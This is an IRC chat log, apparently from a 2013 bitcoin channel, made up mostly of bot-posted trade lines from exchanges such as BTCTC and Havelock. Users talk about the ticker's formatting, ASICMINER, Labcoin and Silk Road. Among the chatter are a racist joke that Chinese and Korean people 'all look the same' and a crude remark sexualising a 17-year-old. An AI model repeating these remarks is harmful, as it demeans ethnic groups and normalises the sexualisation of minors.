some content so it's not just an empty page at first Aug 15 03:04:49 [BTCTC] [ACTIVEMINING] 8 @ 0.005301 = 0.0424 BTC [+] Aug 15 03:04:55 [BTCTC] [CRYPTO-TRADE] 5 @ 0.195 = 0.975 BTC [-] Aug 15 03:05:19 lol, yeah. I was confused at how a blank page looks prettier Aug 15 03:05:54 [BTCTC] [TAT.ASICMINER] 12 @ 0.03944 = 0.4733 BTC [-] Aug 15 03:06:25 THAT FUCKIN BIRD Aug 15 03:08:46 [BTCTC] [ACTIVEMINING] 15 @ 0.005267 = 0.079 BTC [-] Aug 15 03:09:09 one transaction! Aug 15 03:09:14 colors change? Aug 15 03:09:21 Yep, red for bid, green for ask Aug 15 03:09:23 [BTCTC] [LABCOIN] 29 @ 0.001624 = 0.0471 BTC [+] Aug 15 03:09:24 [BTCTC] [LABCOIN] 14 @ 0.001622 = 0.0227 BTC [-] Aug 15 03:09:26 [BTCTC] [LABCOIN] 19 @ 0.001621 = 0.0308 BTC [-] Aug 15 03:09:27 [BTCTC] [LABCOIN] 100 @ 0.00162 = 0.162 BTC [-] Aug 15 03:09:29 [BTCTC] [LABCOIN] 3 @ 0.001601 = 0.0048 BTC [-] Aug 15 03:09:29 [BTCTC] [LABCOIN] 27 @ 0.0016 = 0.0432 BTC [-] Aug 15 03:09:39 hmm, I would like the price to be aligned Aug 15 03:09:46 [BTCTC] [ASICMINER-PT] 1 @ 3.963 BTC [-] Aug 15 03:09:48 [BTCTC] [ASICMINER-PT] 1 @ 3.961 BTC [-] Aug 15 03:09:51 to the right? Aug 15 03:09:58 right now it moves depending on the text before Aug 15 03:10:08 hmm how to explain Aug 15 03:10:20 [BTCTC] [LABCOIN] 6 @ 0.001587 = 0.0095 BTC [-] Aug 15 03:10:21 [BTCTC] [LABCOIN] 71 @ 0.001587 = 0.1127 BTC [-] Aug 15 03:10:23 [BTCTC] [LABCOIN] 81 @ 0.001586 = 0.1285 BTC [-] Aug 15 03:11:06 http://i.imgur.com/1nASjDL.png Aug 15 03:11:24 Ah, okay Aug 15 03:11:26 [HAVELOCK] [AM100] 2 @ 0.0385 = 0.077 BTC [+] Aug 15 03:11:33 [HAVELOCK] [AM100] 21 @ 0.03840001 = 0.8064 BTC [-] Aug 15 03:11:35 maybe it's because I'm used to read like that on IRC Aug 15 03:11:59 [HAVELOCK] [AM100] 2 @ 0.0382 = 0.0764 BTC [-] Aug 15 03:12:01 actually no, assbot does not do that Aug 15 03:12:02 I fixed that long float too Aug 15 03:12:05 [HAVELOCK] [AM100] 1 @ 0.03819997 BTC [-] Aug 15 03:12:26 only #bitcoin-market has the align Aug 15 03:12:28 [HAVELOCK] [AM100] 5 @ 0.0381 = 0.1905 BTC [-] Aug 15 03:12:30 [HAVELOCK] [AM100] 5 @ 0.0381 = 0.1905 BTC [-] Aug 15 03:12:32 [HAVELOCK] [AM100] 4 @ 0.0381 = 0.1524 BTC [-] Aug 15 03:12:46 [HAVELOCK] [AM100] 12 @ 0.038 = 0.456 BTC [-] Aug 15 03:13:04 the + / - of assbot is nice too Aug 15 03:13:31 [BTCTC] [LTC-ATF.B2] 1 @ 0.01043 BTC [+] Aug 15 03:13:33 [HAVELOCK] [AM100] 25 @ 0.038 = 0.95 BTC [-] Aug 15 03:13:38 Yeah, I think I'll add that in in addition to the colors Aug 15 03:13:50 [BTCTC] [DMS.MINING] 52 @ 0.002738 = 0.1424 BTC [+] Aug 15 03:13:51 [BTCTC] [DMS.MINING] 48 @ 0.002739 = 0.1315 BTC [+] Aug 15 03:16:50 [BTCTC] [TAT.ASICMINER] 67 @ 0.03947 = 2.6445 BTC [+] Aug 15 03:16:51 [BTCTC] [TAT.ASICMINER] 31 @ 0.03946 = 1.2233 BTC [-] Aug 15 03:19:49 [BTCTC] [BASIC-MINING] 1 @ 0.3005 BTC [-] Aug 15 03:20:18 [HAVELOCK] [AM100] 1 @ 0.03879998 BTC [+] Aug 15 03:20:21 [BTCTC] [BASIC-MINING] 1 @ 0.3005 BTC [-] Aug 15 03:20:26 [BTCTC] [ACTIVEMINING] 68 @ 0.005267 = 0.3582 BTC [-] Aug 15 03:20:35 I like the formatting, easier to see the price since it bold Aug 15 03:20:35 [BTCTC] [BASIC-MINING] 1 @ 0.3002 BTC [-] Aug 15 03:20:56 [BTCTC] [BASIC-MINING] 3 @ 0.3 = 0.9 BTC [-] Aug 15 03:21:10 [BTCTC] [BASIC-MINING] 4 @ 0.3 = 1.2 BTC [-] Aug 15 03:21:17 [HAVELOCK] [AM100] 2 @ 0.0388 = 0.0776 BTC [+] Aug 15 03:22:00 Thanks Aug 15 03:22:09 I think I need some milder colors though Aug 15 03:22:53 as in a more pastel green and red? Aug 15 03:23:00 Yeah Aug 15 03:23:01 agreed Aug 15 03:23:10 was just thinking that Aug 15 03:23:24 I could go for that, the green isnt bad IMO but the red could be lighter Aug 15 03:24:19 [BTCTC] [LABCOIN] 156 @ 0.001588 = 0.2477 BTC [+] Aug 15 03:24:36 was jgarzik always marked as "staff" on the forums? Aug 15 03:24:44 or is that new Aug 15 03:24:53 he randomly popped into the AM thread Aug 15 03:25:02 https://bitcointalk.org/index.php?topic=99497.msg2935773#msg2935773 Aug 15 03:25:12 ASICMINER: Entering the Future of ASIC Mining by Inventing It Aug 15 03:25:50 [HAVELOCK] [XBOND] 2 @ 0.0010479 = 0.0021 BTC [+] Aug 15 03:25:55 [HAVELOCK] [AM100] 3 @ 0.0388 = 0.1164 BTC [+] Aug 15 03:25:57 [HAVELOCK] [AM100] 81 @ 0.0388899 = 3.1501 BTC [+] Aug 15 03:26:00 [HAVELOCK] [AM100] 5 @ 0.0389 = 0.1945 BTC [+] Aug 15 03:26:01 I don't remember Aug 15 03:26:02 [HAVELOCK] [AM100] 5 @ 0.0389 = 0.1945 BTC [+] Aug 15 03:27:09 [BTCTC] [DMS.PURCHASE] 73 @ 0.02079 = 1.5177 BTC [+] Aug 15 03:34:22 [BTCTC] [LABCOIN] 29 @ 0.001618 = 0.0469 BTC [+] Aug 15 03:34:22 [BTCTC] [LABCOIN] 206 @ 0.001619 = 0.3335 BTC [+] Aug 15 03:35:32 word Aug 15 03:35:32 [BTCTC] [LABCOIN] 29 @ 0.001619 = 0.047 BTC [+] Aug 15 03:35:56 [HAVELOCK] [HIM] 1 @ 0.191 BTC [-] Aug 15 03:36:04 [HAVELOCK] [HIM] 2 @ 0.19 = 0.38 BTC [-] Aug 15 03:36:49 [BTCTC] [DMS.SELLING] 73 @ 0.01828 = 1.3344 BTC [-] Aug 15 03:37:29 ThickAsThieves for a while at least. Aug 15 03:37:40 [BTCTC] [DMS.SELLING] 343 @ 0.01829 = 6.2735 BTC [+] Aug 15 03:39:56 [BTCTC] [LABCOIN] 235 @ 0.001624 = 0.3816 BTC [+] Aug 15 03:41:20 [BTCTC] [LABCOIN] 3 @ 0.001625 = 0.0049 BTC [+] Aug 15 03:41:47 [HAVELOCK] [XBOND] 20 @ 0.0010479 = 0.021 BTC [+] Aug 15 03:42:46 [BTCTC] [DMS.PURCHASE] 2134 @ 0.02079 = 44.3659 BTC [+] Aug 15 03:43:44 [HAVELOCK] [AM100] 81 @ 0.0389099 = 3.1517 BTC [+] Aug 15 03:44:01 [HAVELOCK] [XBOND] 10 @ 0.0010479 = 0.0105 BTC [+] Aug 15 03:44:04 [HAVELOCK] [AM100] 4 @ 0.03891 = 0.1556 BTC [+] Aug 15 03:44:06 [HAVELOCK] [AM100] 81 @ 0.0389099 = 3.1517 BTC [-] Aug 15 03:44:35 [BTCTC] [DMS.SELLING] 5 @ 0.01829 = 0.0915 BTC [+] Aug 15 03:44:37 [BTCTC] [DMS.SELLING] 100 @ 0.0183 = 1.83 BTC [+] Aug 15 03:44:38 [BTCTC] [DMS.SELLING] 50 @ 0.01835 = 0.9175 BTC [+] Aug 15 03:44:39 [BTCTC] [DMS.SELLING] 440 @ 0.01839 = 8.0916 BTC [+] Aug 15 03:44:40 [BTCTC] [DMS.SELLING] 500 @ 0.0184 = 9.2 BTC [+] Aug 15 03:44:41 [BTCTC] [DMS.SELLING] 99 @ 0.0184 = 1.8216 BTC [+] Aug 15 03:44:44 [HAVELOCK] [LABCO] 2 @ 0.00175 = 0.0035 BTC [-] Aug 15 03:44:47 [HAVELOCK] [XBOND] 75 @ 0.0010479 = 0.0786 BTC [+] Aug 15 03:44:54 [HAVELOCK] [LABCO] 2 @ 0.00179995 = 0.0036 BTC [+] Aug 15 03:45:12 [BTCTC] [ACTIVEMINING] 83 @ 0.00527 = 0.4374 BTC [+] Aug 15 03:45:13 [BTCTC] [ACTIVEMINING] 40 @ 0.005263 = 0.2105 BTC [-] Aug 15 03:45:14 [BTCTC] [ACTIVEMINING] 10 @ 0.005262 = 0.0526 BTC [-] Aug 15 03:45:17 [BTCTC] [ACTIVEMINING] 100 @ 0.005262 = 0.5262 BTC [-] Aug 15 03:45:22 [BTCTC] [ACTIVEMINING] 200 @ 0.005261 = 1.0522 BTC [-] Aug 15 03:45:27 [BTCTC] [ACTIVEMINING] 100 @ 0.00526 = 0.526 BTC [-] Aug 15 03:45:29 [HAVELOCK] [XBOND] 2 @ 0.00104999 = 0.0021 BTC [+] Aug 15 03:45:31 [BTCTC] [ACTIVEMINING] 63 @ 0.00526 = 0.3314 BTC [-] Aug 15 03:45:34 [BTCTC] [ACTIVEMINING] 90 @ 0.005243 = 0.4719 BTC [-] Aug 15 03:45:40 [BTCTC] [ACTIVEMINING] 169 @ 0.005241 = 0.8857 BTC [-] Aug 15 03:45:45 [HAVELOCK] [XBOND] 3 @ 0.00104999 = 0.0031 BTC [+] Aug 15 03:46:28 [HAVELOCK] [LABCO] 2 @ 0.00179995 = 0.0036 BTC [+] Aug 15 03:46:42 [BTCTC] [DMS.MINING] 40 @ 0.002739 = 0.1096 BTC [+] Aug 15 03:46:44 [HAVELOCK] [LABCO] 3 @ 0.00179995 = 0.0054 BTC [+] Aug 15 03:47:00 [HAVELOCK] [XBOND] 2 @ 0.00104999 = 0.0021 BTC [+] Aug 15 03:47:32 [HAVELOCK] [XBOND] 3 @ 0.00104999 = 0.0031 BTC [+] Aug 15 03:47:59 [BTCTC] [DMS.PURCHASE] 390 @ 0.02079 = 8.1081 BTC [+] Aug 15 03:48:45 [BTCTC] [DMS.MINING] 20 @ 0.002711 = 0.0542 BTC [-] Aug 15 03:48:57 [BTCTC] [DMS.SELLING] 15 @ 0.01841 = 0.2762 BTC [+] Aug 15 03:48:58 [BTCTC] [DMS.SELLING] 5 @ 0.01841 = 0.0921 BTC [+] Aug 15 03:49:05 [BTCTC] [DMS.PURCHASE] 20 @ 0.02079 = 0.4158 BTC [+] Aug 15 03:49:45 [BTCTC] [DMS.MINING] 17 @ 0.002711 = 0.0461 BTC [-] Aug 15 03:49:46 [BTCTC] [DMS.SELLING] 17 @ 0.01841 = 0.313 BTC [+] Aug 15 03:49:48 [BTCTC] [DMS.PURCHASE] 17 @ 0.02079 = 0.3534 BTC [+] Aug 15 03:49:50 [HAVELOCK] [XBOND] 2 @ 0.00104999 = 0.0021 BTC [+] Aug 15 03:50:17 [BTCTC] [TAT.ASICMINER] 9 @ 0.04011 = 0.361 BTC [+] Aug 15 03:50:24 [HAVELOCK] [AM100] 5 @ 0.03891 = 0.1946 BTC [+] Aug 15 03:50:33 [BTCTC] [DMS.MINING] 10 @ 0.002711 = 0.0271 BTC [-] Aug 15 03:50:42 [BTCTC] [DMS.PURCHASE] 10 @ 0.02079 = 0.2079 BTC [+] Aug 15 03:51:24 [BTCTC] [DMS.MINING] 8 @ 0.002711 = 0.0217 BTC [-] Aug 15 03:51:33 [BTCTC] [DMS.PURCHASE] 8 @ 0.02079 = 0.1663 BTC [+] Aug 15 03:51:44 [MPEX] [S.MPOE] 20972 @ 0.00084714 = 17.7662 BTC [-] Aug 15 03:52:43 [HAVELOCK] [SDSTM] 1 @ 0.0062399 BTC [+] Aug 15 03:52:47 [BTCTC] [DMS.MINING] 390 @ 0.00271 = 1.0569 BTC [-] Aug 15 03:52:49 [HAVELOCK] [SDSTM] 13 @ 0.006274 = 0.0816 BTC [+] Aug 15 03:52:58 [BTCTC] [DMS.MINING] 33 @ 0.002739 = 0.0904 BTC [+] Aug 15 03:53:21 .d Aug 15 03:53:21 50810339.04828 | Next Diff in 1809 blocks | Estimated Change: 12.8834% in 10d 22h 28m 44s Aug 15 03:53:25 [BTCTC] [DMS.PURCHASE] 50 @ 0.02079 = 1.0395 BTC [+] Aug 15 03:53:29 ;;nethash Aug 15 03:53:29 407628.958241 Aug 15 03:55:06 [BTCTC] [DMS.MINING] 50 @ 0.00271 = 0.1355 BTC [-] Aug 15 03:55:25 [BTCTC] [LABCOIN] 29 @ 0.001626 = 0.0472 BTC [+] Aug 15 03:55:42 [BTCTC] [DMS.PURCHASE] 8 @ 0.02079 = 0.1663 BTC [+] Aug 15 03:56:18 [BTCTC] [LABCOIN] 2 @ 0.001624 = 0.0032 BTC [-] Aug 15 03:56:20 [BTCTC] [LABCOIN] 18 @ 0.001625 = 0.0293 BTC [+] Aug 15 03:57:18 [BTCTC] [DMS.MINING] 8 @ 0.00271 = 0.0217 BTC [-] Aug 15 03:57:37 [BTCTC] [ACTIVEMINING] 20 @ 0.005241 = 0.1048 BTC [-] Aug 15 03:57:50 [BTCTC] [DMS.PURCHASE] 1 @ 0.02079 BTC [+] Aug 15 03:59:24 [BTCTC] [ASICMINER-PT] 1 @ 3.961 BTC [-] Aug 15 03:59:45 [BTCTC] [ASICMINER-PT] 1 @ 3.961 BTC [-] Aug 15 03:59:50 [BTCTC] [DMS.MINING] 39 @ 0.00271 = 0.1057 BTC [-] Aug 15 03:59:51 [BTCTC] [DMS.MINING] 24 @ 0.002706 = 0.0649 BTC [-] Aug 15 03:59:52 [BTCTC] [DMS.MINING] 701 @ 0.002701 = 1.8934 BTC [-] Aug 15 04:00:16 [BTCTC] [ACTIVEMINING] 111 @ 0.005241 = 0.5818 BTC [-] Aug 15 04:00:20 [BTCTC] [ACTIVEMINING] 75 @ 0.00524 = 0.393 BTC [-] Aug 15 04:00:21 [BTCTC] [ACTIVEMINING] 100 @ 0.005235 = 0.5235 BTC [-] Aug 15 04:00:22 [BTCTC] [ACTIVEMINING] 100 @ 0.00523 = 0.523 BTC [-] Aug 15 04:00:24 [BTCTC] [ACTIVEMINING] 450 @ 0.005225 = 2.3513 BTC [-] Aug 15 04:00:25 [BTCTC] [ACTIVEMINING] 164 @ 0.005222 = 0.8564 BTC [-] Aug 15 04:01:28 [BTCTC] [DMS.PURCHASE] 943 @ 0.02079 = 19.605 BTC [+] Aug 15 04:03:31 [BTCTC] [LABCOIN] 235 @ 0.001629 = 0.3828 BTC [+] Aug 15 04:04:00 [BTCTC] [DMS.MINING] 1 @ 0.002701 BTC [-] Aug 15 04:06:05 [BTCTC] [TAT.ASICMINER] 14 @ 0.03999 = 0.5599 BTC [-] Aug 15 04:07:30 [BTCTC] [LABCOIN] 235 @ 0.001653 = 0.3885 BTC [+] Aug 15 04:07:41 [BTCTC] [LABCOIN] 1 @ 0.001652 BTC [-] Aug 15 04:07:43 [BTCTC] [LABCOIN] 52 @ 0.001597 = 0.083 BTC [-] Aug 15 04:07:44 [BTCTC] [LABCOIN] 255 @ 0.001592 = 0.406 BTC [-] Aug 15 04:07:45 [BTCTC] [LABCOIN] 1000 @ 0.001591 = 1.591 BTC [-] Aug 15 04:07:47 [BTCTC] [LABCOIN] 1010 @ 0.00159 = 1.6059 BTC [-] Aug 15 04:08:21 [BTCTC] [LABCOIN] 29 @ 0.001589 = 0.0461 BTC [-] Aug 15 04:08:21 [BTCTC] [LABCOIN] 206 @ 0.00159 = 0.3275 BTC [+] Aug 15 04:09:35 [BTCTC] [DMS.SELLING] 10 @ 0.01839 = 0.1839 BTC [-] Aug 15 04:09:37 [BTCTC] [DMS.SELLING] 8 @ 0.01839 = 0.1471 BTC [-] Aug 15 04:10:13 [BTCTC] [LABCOIN] 235 @ 0.001653 = 0.3885 BTC [+] Aug 15 04:11:51 [BTCTC] [LABCOIN] 235 @ 0.00161 = 0.3784 BTC [-] Aug 15 04:13:23 [BTCTC] [LABCOIN] 235 @ 0.001604 = 0.3769 BTC [-] Aug 15 04:13:25 [BTCTC] [LABCOIN] 15 @ 0.001605 = 0.0241 BTC [+] Aug 15 04:14:22 [BTCTC] [LABCOIN] 36 @ 0.001604 = 0.0577 BTC [-] Aug 15 04:15:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.0394 BTC [-] Aug 15 04:15:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.03933 = 0.118 BTC [-] Aug 15 04:15:40 [HAVELOCK] [CFIG] 20 @ 0.15 = 3 BTC Aug 15 04:15:43 [BTCTC] [TAT.ASICMINER] 15 @ 0.03932 = 0.5898 BTC [-] Aug 15 04:15:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.0393 = 0.0786 BTC [-] Aug 15 04:15:48 [BTCTC] [DMS.PURCHASE] 200 @ 0.02079 = 4.158 BTC [+] Aug 15 04:15:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.0392 = 0.1176 BTC [-] Aug 15 04:15:52 [BTCTC] [TAT.ASICMINER] 75 @ 0.03911 = 2.9333 BTC [-] Aug 15 04:16:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.03911 = 0.0782 BTC [-] Aug 15 04:18:27 [HAVELOCK] [HIM] 2 @ 0.209 = 0.418 BTC [+] Aug 15 04:18:30 [BTCTC] [DMS.PURCHASE] 400 @ 0.02079 = 8.316 BTC [+] Aug 15 04:20:24 [BTCTC] [NASTY-PT] 55 @ 0.00435 = 0.2393 BTC [-] Aug 15 04:21:23 [BTCTC] [ASICMINER-PT] 1 @ 3.961 BTC [-] Aug 15 04:21:25 [BTCTC] [ASICMINER-PT] 1 @ 3.96 BTC [-] Aug 15 04:22:52 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.001101 = 0.0143 BTC [+] Aug 15 04:23:01 mircea_popescu: are you really just now seeing the Graduate? Aug 15 04:23:31 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0011 BTC [-] Aug 15 04:23:55 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001005 BTC [-] Aug 15 04:24:13 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001 BTC [-] Aug 15 04:24:29 [BTCTC] [TAT.VIRTUALMINE] 222 @ 0.0009521 = 0.2114 BTC [-] Aug 15 04:27:21 [BTCTC] [ASICMINER-PT] 1 @ 3.958 BTC [-] Aug 15 04:27:23 [BTCTC] [ASICMINER-PT] 1 @ 3.956 BTC [-] Aug 15 04:28:13 [BTCTC] [TAT.ASICMINER] 6 @ 0.03995 = 0.2397 BTC [+] Aug 15 04:28:14 [BTCTC] [ASICMINER-PT] 1 @ 3.956 BTC [-] Aug 15 04:28:20 [BTCTC] [ASICMINER-PT] 4 @ 3.954 = 15.816 BTC [-] Aug 15 04:28:26 [BTCTC] [ACTIVEMINING] 8 @ 0.005417 = 0.0433 BTC [+] Aug 15 04:28:43 thestringpuller yes. Aug 15 04:29:16 [HAVELOCK] [XBOND] 488 @ 0.00104999 = 0.5124 BTC [+] Aug 15 04:29:19 [HAVELOCK] [XBOND] 165 @ 0.00105 = 0.1733 BTC [+] Aug 15 04:29:46 [BTCTC] [LABCOIN] 20 @ 0.001597 = 0.0319 BTC [-] Aug 15 04:29:48 [BTCTC] [LABCOIN] 2 @ 0.001598 = 0.0032 BTC [+] Aug 15 04:29:50 [BTCTC] [LABCOIN] 42 @ 0.001604 = 0.0674 BTC [+] Aug 15 04:29:52 [BTCTC] [LABCOIN] 53 @ 0.001608 = 0.0852 BTC [+] Aug 15 04:30:56 [BTCTC] [DMS.PURCHASE] 64 @ 0.02079 = 1.3306 BTC [+] Aug 15 04:31:02 [BTCTC] [TAT.ASICMINER] 58 @ 0.03913 = 2.2695 BTC [-] Aug 15 04:31:22 [BTCTC] [TAT.MINIGAME] 30 @ 0.0002315 = 0.0069 BTC [-] Aug 15 04:31:56 release cycles a little slower in .ro Aug 15 04:32:27 [BTCTC] [ASICMINER-PT] 6 @ 3.954 = 23.724 BTC [-] Aug 15 04:32:29 [BTCTC] [ASICMINER-PT] 4 @ 3.95 = 15.8 BTC [-] Aug 15 04:32:54 didn't that movie come out before any of us were born? Aug 15 04:32:57 [BTCTC] [BASIC-MINING] 3 @ 0.301 = 0.903 BTC [+] Aug 15 04:33:06 I take it you didn't like it mircea_popescu Aug 15 04:33:12 [BTCTC] [DMS.SELLING] 30 @ 0.0184 = 0.552 BTC [+] Aug 15 04:33:26 nup, i was 5 when it came out Aug 15 04:33:30 60s. and i liked it just fine Aug 15 04:33:59 course i'd have ended it with him getting both girls pregnant, but that's me. Aug 15 04:34:10 [BTCTC] [LABCOIN] 12 @ 0.001674 = 0.0201 BTC [+] Aug 15 04:34:12 [BTCTC] [LABCOIN] 100 @ 0.001675 = 0.1675 BTC [+] Aug 15 04:34:19 you should watch the "appendix" of The Graduate with Jennifer Anniston Aug 15 04:34:29 it's like the chick flick version entitled "Rumor Has It..." Aug 15 04:34:37 [BTCTC] [LABCOIN] 375 @ 0.001687 = 0.6326 BTC [+] Aug 15 04:34:41 http://www.imdb.com/title/tt0398375/ Aug 15 04:34:48 Rumour Has It... (2005) - IMDb Aug 15 04:34:59 [BTCTC] [ASICMINER-PT] 1 @ 3.95 BTC [-] Aug 15 04:35:06 [BTCTC] [LABCOIN] 3000 @ 0.001688 = 5.064 BTC [+] Aug 15 04:35:10 i think i'll pass on that Aug 15 04:35:20 :D Aug 15 04:35:33 [BTCTC] [DMS.PURCHASE] 200 @ 0.02079 = 4.158 BTC [+] Aug 15 04:35:35 [BTCTC] [ASICMINER-PT] 1 @ 3.95 BTC [-] Aug 15 04:36:05 ;;nethash Aug 15 04:36:06 407628.958241 Aug 15 04:36:15 perhaps jeff doesnt realise AM are chinese Aug 15 04:36:20 [BTCTC] [DMS.PURCHASE] 2 @ 0.02079 = 0.0416 BTC [+] Aug 15 04:36:29 i thought they were korean Aug 15 04:36:41 same thing right? Aug 15 04:36:47 dub which am ? asicminer ? activemining ? amethyst ? astromunging ? Aug 15 04:36:49 they all look the same Aug 15 04:36:51 [BTCTC] [ASICMINER-PT] 4 @ 3.95 = 15.8 BTC [-] Aug 15 04:37:00 all of the above Aug 15 04:37:06 [BTCTC] [DMS.SELLING] 64 @ 0.01839 = 1.177 BTC [-] Aug 15 04:37:12 is active miner even active? Aug 15 04:37:19 no Aug 15 04:37:22 labcoin is confirmed failure Aug 15 04:37:27 it is? Aug 15 04:37:43 didn't you send me some btc talk link about how they are just hiring IC designers? Aug 15 04:37:50 yes Aug 15 04:38:11 while fairly damning I'm not sure thats confirmed failure Aug 15 04:38:49 http://trilema.com/2013/the-anatomy-of-a-scam/ <- that's the anatomy of labcoin no? Aug 15 04:38:52 The anatomy of a scam. pe Trilema - Un blog de Mircea Popescu. Aug 15 04:38:56 what's confirmed failure ? shower pics showing 17 yo azn masturbating in shower ? Aug 15 04:38:58 'One standard miner practice is to behave economically rational' Aug 15 04:39:04 ahahahaha Aug 15 04:39:11 BWHHAHAHAHA o excuse me gotta go now Aug 15 04:39:25 bye bye Aug 15 04:39:31 one standard miner practise is probably to notice the large number of stales or orphans you are generating Aug 15 04:40:33 who is generating orphan blocks? Aug 15 04:40:38 AM was Aug 15 04:40:48 wherefore? Aug 15 04:40:54 moreover what was the caus? Aug 15 04:40:54 ostensibly due to terrible connectivity Aug 15 04:41:00 oh Aug 15 04:41:06 the block didn't get properly relayed to the network? Aug 15 04:41:14 its buried somewhere in the thread but they were getting a lot of blocks orphaned Aug 15 04:41:21 somethign like that Aug 15 04:41:27 lol China Aug 15 04:41:32 and their great firewall Aug 15 04:41:40 moar proxies plz Aug 15 04:41:56 anyway, the idea that they might know how to make mining their own transactions work is tenuous Aug 15 04:42:25 [BTCTC] [TAT.ASICMINER] 12 @ 0.03999 = 0.4799 BTC [+] Aug 15 04:43:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.03999 BTC [+] Aug 15 04:43:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.03999 = 0.12 BTC [+] Aug 15 04:44:25 at this point they could just hire garzik for a croissant. he'd do it just to be involved. Aug 15 04:45:04 [BTCTC] [DMS.PURCHASE] 100 @ 0.02079 = 2.079 BTC [+] Aug 15 04:45:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.03999 BTC [+] Aug 15 04:46:30 mircea_popescu: I know you hate on Silk Road, but the revenue estimate is some $540 million a year... Aug 15 04:46:35 [BTCTC] [BASIC-MINING] 7 @ 0.301 = 2.107 BTC [+] Aug 15 04:46:40 fuck me, the comments on that labcoin article alone are proof of te scam Aug 15 04:46:59 [BTCTC] [BASIC-MINING] 3 @ 0.3 = 0.9 BTC [-] Aug 15 04:47:15 its like the swede guy hired ciuciu to drive his sock army Aug 15 04:47:18 thestringpuller why do i hate it ? Aug 15 04:47:30 dub tell me about it. Aug 15 04:47:56 'iron manolescu' is pretty cool though Aug 15 04:48:25 you always bash Dead Pirate Roberts when he talks publicly as being "irrelevant to bitcoin" Aug 15 04:48:57 [BTCTC] [DMS.SELLING] 200 @ 0.0181 = 3.62 BTC [-] Aug 15 04:49:00 [BTCTC] [DMS.SELLING] 200 @ 0.0181 = 3.62 BTC [-] Aug 15 04:49:07 thestringpuller bitcoin went up 10x and the usg started making moves since then. Aug 15 04:49:49 [BTCTC] [LTC-ATF.B2] 2 @ 0.01043 = 0.0209 BTC [+] Aug 15 04:50:31 mircea_popescu but what does that have to do with DPR? Aug 15 04:50:50 thsts the point Aug 15 04:51:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.03993 BTC [-] Aug 15 04:51:47 thestringpuller the lists just change. there's worse problems for bitcoin atm than a bunch of stoners Aug 15 04:52:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.03999 = 0.08 BTC [+] Aug 15 04:52:31 I would say DPR stands for similar freedoms you mention. Particularly accessibility to a free market. Aug 15 04:53:00 this wasn't much of an issue six months ago. it's becoming a huge issue quite rapidly, Aug 15 04:53:08 [BTCTC] [TAT.ASICMINER] 24 @ 0.03999 = 0.9598 BTC [+] Aug 15 04:53:13 at about the approximate rate at which the various rotten reeds "involved" in bitcoin snap all around. Aug 15 04:53:16 [BTCTC] [ACTIVEMINING] 2 @ 0.005329 = 0.0107 BTC [-] Aug 15 04:53:48 [BTCTC] [LABCOIN] 235 @ 0.001654 = 0.3887 BTC [-] Aug 15 04:54:37 in regards to govt. attempting to meddle? Aug 15 04:54:48 or some other entity you are referring to? Aug 15 04:54:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.0402 = 0.0804 BTC [+] Aug 15 04:54:59 you lost me too Aug 15 04:55:05 there's the idiotic scammers eating from one end and the idiotic bureaucrats eating from the other. Aug 15 04:55:36 in this circumstance i couldn't care less what the pill people do. Aug 15 04:57:39 [BTCTC] [ASICMINER-PT] 1 @ 3.998 BTC [+] Aug 15 04:58:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Aug 15 04:58:31 because the "pill people" don't affect as much as the aforementioned? Aug 15 05:02:03 yea Aug 15 05:02:28 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.001236 = 0.0247 BTC [+] Aug 15 05:02:41 what's the worst they're gonna do, make us all see colors ? Aug 15 05:03:09 [BTCTC] [ACTIVEMINING] 31 @ 0.005225 = 0.162 BTC [-] Aug 15 05:03:10 [BTCTC] [ACTIVEMINING] 36 @ 0.005222 = 0.188 BTC [-] Aug 15 05:03:12 [BTCTC] [ACTIVEMINING] 100 @ 0.005222 = 0.5222 BTC [-] Aug 15 05:03:13 [BTCTC] [ACTIVEMINING] 6 @ 0.005222 = 0.0313 BTC [-] Aug 15 05:03:14 [BTCTC] [ACTIVEMINING] 227 @ 0.005221 = 1.1852 BTC [-] Aug 15 05:03:45 dub actually i lolled at the "2013 | June | There are now twice as much people hating Mircea Popescu as holding litecoins" stuff Aug 15 05:05:59 [BTCTC] [LABCOIN] 20 @ 0.00167 = 0.0334 BTC [+] Aug 15 05:06:10 [BTCTC] [LABCOIN] 1 @ 0.00167 BTC [+] Aug 15 05:08:08 thats good Aug 15 05:08:18 I got sidetracked on a link Aug 15 05:08:27 pizza_deliveri: I'll put effort into go after you for this Aug 15 05:10:23 To deliver a pizza? Aug 15 05:11:29 presumably Aug 15 05:13:12 [BTCTC] [ASICMINER-PT] 1 @ 3.999 BTC [+] Aug 15 05:16:01 [BTCTC] [DMS.PURCHASE] 10 @ 0.02079 = 0.2079 BTC [+] Aug 15 05:16:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.04 = 0.12 BTC [-] Aug 15 05:17:49 [BTCTC] [DMS.SELLING] 25 @ 0.01837 = 0.4593 BTC [+] Aug 15 05:17:57 ;;nethash Aug 15 05:17:57 408050.960584 Aug 15 05:18:41 [BTCTC] [TAT.ASICMINER] 58 @ 0.04 = 2.32 BTC [-] Aug 15 05:19:47 [BTCTC] [LABCOIN] 8 @ 0.001677 = 0.0134 BTC [+] Aug 15 05:20:19 [BTCTC] [BASIC-MINING] 1 @ 0.3197 BTC [+] Aug 15 05:21:44 [BTCTC] [LABCOIN] 227 @ 0.001675 = 0.3802 BTC [-] Aug 15 05:21:51 dub esl makes all beligerence better Aug 15 05:24:05 [BTCTC] [DMS.SELLING] 57 @ 0.01837 = 1.0471 BTC [+] Aug 15 05:24:35 [BTCTC] [LABCOIN] 2 @ 0.001674 = 0.0033 BTC [-] Aug 15 05:24:37 [BTCTC] [LABCOIN] 20 @ 0.001675 = 0.0335 BTC [+] Aug 15 05:24:59 [BTCTC] [DMS.PURCHASE] 35 @ 0.02079 = 0.7277 BTC [+] Aug 15 05:25:57 